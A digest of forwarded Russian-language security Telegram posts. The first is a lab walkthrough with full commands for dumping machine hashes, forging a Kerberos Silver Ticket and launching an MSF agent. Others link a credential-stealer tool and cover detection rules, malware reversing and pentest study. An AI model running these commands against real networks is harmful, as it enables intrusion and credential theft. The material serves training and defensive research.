Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы
NetLogon, LanManServer и LanManWorkstation и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled
После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (
nmap -p 445 -sT -Pn <serverIP>), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.Имеем 2 проблемы:
1) Не работают службы
NetLogon, LanManServer и LanManWorkstation, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.
Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.
Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'
...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4
Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта
impacket-lookupsid из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720
После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения
KRB5CCNAME:proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache
Шаг 2. ATExec Pro
После этого уже при помощи известного нам
atexec-pro.py и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF): proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30
Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe
Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи
impacket-lookupsid;2) Создание Silvet Ticket при помощи
impacket-ticketer для привилегированного доступа к целевому хосту;3) Получение доступа к целевому хосту при помощи
atexec-pro.py с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
#soc
Свежие индикаторы компрометации: NTLM Relay Attack
Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
Свежие индикаторы компрометации: NTLM Relay Attack
Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
DSInternals
Indicator of Compromise: NTLM Relay Attack with Shadow Credentials
Updated in January 2026 to reflect changes in the behavior of domain controllers regarding the CUSTOMKEYINFO_FLAGS_MFA_NOT_USED flag. TL;DR The current implementation of the shadow credentials attack in the Impacket framework, most notably used by the ntlmrelayx.py…
👍1
Forwarded from Пентестер на мотоцикле
common_security_issues_in_financially-orientated.pdf.pdf
8.6 MB
На практике часто приходится сталкиваться с тестированием платёжных систем. Данная методичка поможет пентестерам проводить более тщательный анализ безопасности таких систем. На проекте также воспользовался данным материалом.
▎Краткое содержание:
Документ переведён на русский язык, но оригинал на английском также сохранён. Когда встретится кривой перевод, всегда можно свериться с оригинальным текстом страницей выше.
Сохраняйте себе, чтобы не потерять!
#материал
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ESCalator
Используете ли вы криптографию правильно? 🔓
Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях.
В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование.
☠️ Выяснилось, что ВПО «падает» при попытке вызова функции
Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции
Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org.
#tips #reverse #malware #cryptography #TI
@ptescalator
Группе исследования сложных угроз департамента Threat Intelligence часто приходится решать интересные задачи в процессе реверса ВПО. Этот раз не стал исключением. Существует такая техника, как Execution Guardrails: Environmental Keying, — она нужна для ограничения выполнения ВПО только в конкретной целевой среде. Например, ее использует группировка Decoy Dog в своих операциях.
В попавшем к нам на исследование семпле применялась эта же техника: в качестве ключа для используемых строк использовалось имя компьютера, которого у нас не было, дополнительно семпл был обфусцирован. В случае, если ВПО запускалось не на нужном злоумышленнику устройстве, оно крашилось — отсюда и стартует наше исследование.
LoadLibraryA с переданным именем библиотеки в качестве неотображаемых байтов. Этот набор байтов должен представлять собой имя библиотеки, которая расшифровывается в цикле; при каждой итерации берется символ от имени компьютера, с помощью логических операций приводится в необратимый вид, а после уже гаммируется с зашифрованным текстом и его однобайтовой константой. Чтобы вычислить промежуточный ключ (который формируется в результате логических операций), мы прибегнули к атаке на основе открытого текста. Возвращаясь к функции
LoadLibraryA: мы знаем, что имя библиотеки будет составлять 13 байт в кодировке ASCII + '\x00'; так мы смогли восстановить треть ключа, а далее по аналогии уже с другими строками восстановили оставшуюся часть ключа.Дешифрование строки:
F(sym_comp_name) ^ sym_enc ^ cnst_enc = sym_dec
F(sym_comp_name) — логические операции
Получение промежуточного ключа:
sym_dll_name ^ sym_enc ^ cnst_enc = irr_sym_key
irr_sym_key — промежуточный байт ключа, необратимый
Группа исследования сложных угроз рекомендует одну из платформ для изучения криптоанализа — cryptohack.org.
#tips #reverse #malware #cryptography #TI
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Pentester's Backlog
🦾 Обещанная статья на тему сдачи OSCP+ в 2025 году.
Что ждать на экзамене, как сейчас готовиться, что творится вообще!?
😼 Всё это я постарался ёмко описать в данном материале
🔗 Ссылка на статью в telegra.ph
Что ждать на экзамене, как сейчас готовиться, что творится вообще!?
😼 Всё это я постарался ёмко описать в данном материале
🔗 Ссылка на статью в telegra.ph
Telegraph
OSCP (PEN-200) - ГЛАЗА НЕ БОЯТСЯ, И РУКИ ДЕЛАЮТ!
Привет! Обещанная статья про сдачу OSCP не заставила себя долго ждать. Для многих (как и для меня) этот экзаменом является неким milestone на пути обучения пентесту, явно указывающим коллегам по цеху на то, что ты что-то знаешь, что-то умеешь, но до уровня…
Forwarded from s0ld13r ch. (s0ld13r)
S0LD13R - LETS HUNT PIPE'S 😠
Как обычно, вечерком хантил тему C2 и накидал пачку сигнатур для Suricata по SMB Named Pipes. Теперь можно отлавливать малварь, которая прячется в сети через именованные каналы🚨
Лайфхак по написанию детектов: берешь +- качественный репозиторий с hunting queries, например как здесь, выдергиваешь индикаторы и пилишь под него новое Suricata правило. Не факт что 100% попадеться то же самое, но с каждым шагом обогащаем знания и делаем проверку на "дурака"🐈⬛
С чем имеем дело?
SMB Named Pipe – механизм межпроцессного взаимодействия (IPC) через SMB, который позволяет передавать данные между процессами, в том числе между разными машинами. Злоумышленники используют Named Pipes для выполнения команд, передачи данных и организации C2-каналов🔍
Suricata - open-source система обнаружения и предотвращения вторжений (IDS/IPS), анализирующая сетевой трафик по сигнатурам и аномалиям🐈⬛
Пока базово собрал 37 правил по именованным каналам в свой репозиторий по TI, можно посмотреть тут👮♀️
Из интересного: PoshC2, CobaltStrike, PsExec, Creds Dump и другие утилиты😎
P.S репа с правилами будет периодически обновляться, буду рад коммитам)
@s0ld13r_ch
Как обычно, вечерком хантил тему C2 и накидал пачку сигнатур для Suricata по SMB Named Pipes. Теперь можно отлавливать малварь, которая прячется в сети через именованные каналы
Лайфхак по написанию детектов: берешь +- качественный репозиторий с hunting queries, например как здесь, выдергиваешь индикаторы и пилишь под него новое Suricata правило. Не факт что 100% попадеться то же самое, но с каждым шагом обогащаем знания и делаем проверку на "дурака"
С чем имеем дело?
SMB Named Pipe – механизм межпроцессного взаимодействия (IPC) через SMB, который позволяет передавать данные между процессами, в том числе между разными машинами. Злоумышленники используют Named Pipes для выполнения команд, передачи данных и организации C2-каналов
Suricata - open-source система обнаружения и предотвращения вторжений (IDS/IPS), анализирующая сетевой трафик по сигнатурам и аномалиям
Пока базово собрал 37 правил по именованным каналам в свой репозиторий по TI, можно посмотреть тут
Из интересного: PoshC2, CobaltStrike, PsExec, Creds Dump и другие утилиты
P.S репа с правилами будет периодически обновляться, буду рад коммитам)
@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
#pentest
RunAs Utility Credential Stealer
Свежая утилита реализует 3 техники: Hooking CreateProcessWithLogonW, Smart Keylogging, Remote Debugging.
Может быть полезна при проведении пентестов на своих проектах.
RunAs Utility Credential Stealer
Свежая утилита реализует 3 техники: Hooking CreateProcessWithLogonW, Smart Keylogging, Remote Debugging.
Может быть полезна при проведении пентестов на своих проектах.
GitHub
GitHub - DarkSpaceSecurity/RunAs-Stealer: RunAs Utility Credential Stealer implementing 3 techniques : Hooking CreateProcessWithLogonW…
RunAs Utility Credential Stealer implementing 3 techniques : Hooking CreateProcessWithLogonW, Smart Keylogging, Remote Debugging - DarkSpaceSecurity/RunAs-Stealer
👍2
Forwarded from Пентестер на мотоцикле
Однажды появилась задача поисследовать Bitrix на уязвимости. Нашёл очень классные материалы по атакам на данную CMS на русском языке. С помощью них обнаружил несколько некритических уязвимостей на проекте, а потом отпала необходимость ковырять данный вектор. Ну и ладно)
Всегда держу ссылочки при себе на всякий случай, вам тоже советую их сохранить.
#материал
Please open Telegram to view this post
VIEW IN TELEGRAM